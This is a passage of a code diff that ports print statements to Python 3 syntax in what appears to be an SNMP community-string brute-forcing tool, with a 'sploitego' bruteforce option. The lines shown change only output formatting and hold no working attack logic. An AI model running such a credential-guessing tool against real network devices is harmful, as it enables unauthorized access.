|
|
639 |
if options.stdin:
|
|
640 |
- print >> sys.stderr, "Reading input for community strings ..."
|
|
641 |
+ print("Reading input for community strings ...", file=sys.stderr)
|
|
642 |
else:
|
|
643 |
- print >> sys.stderr, "Trying %d community strings ..." % len(communities)
|
|
644 |
+ print("Trying %d community strings ..." % len(communities), file=sys.stderr)
|
|
645 |
|
|
646 |
if options.sploitego: #sploitego method of bruteforce
|
|
647 |
if ips:
|
|
648 |
@@ -755,7 +755,7 @@ def main():
|
|
649 |
r.version=version
|
|
650 |
r.community=i
|
|
651 |
results.append(r)
|
|
652 |
- print ip, version+'\t',result
|
|
653 |
+ print(ip, version+'\t',result)
|
|
654 |
else:
|
|
655 |
parser.print_help()
|
|
656 |
|
|
657 |
@@ -783,7 +783,7 @@ def main():
|
|
658 |
if not options.enum:
|
|
659 |
select_community(results,options)
|
|
660 |
|
|
661 |
- print "Finished!"
|
|
662 |
+ print("Finished!")
|
|
663 |
|
|
664 |
if __name__ == "__main__":
|
|
665 |
main()
|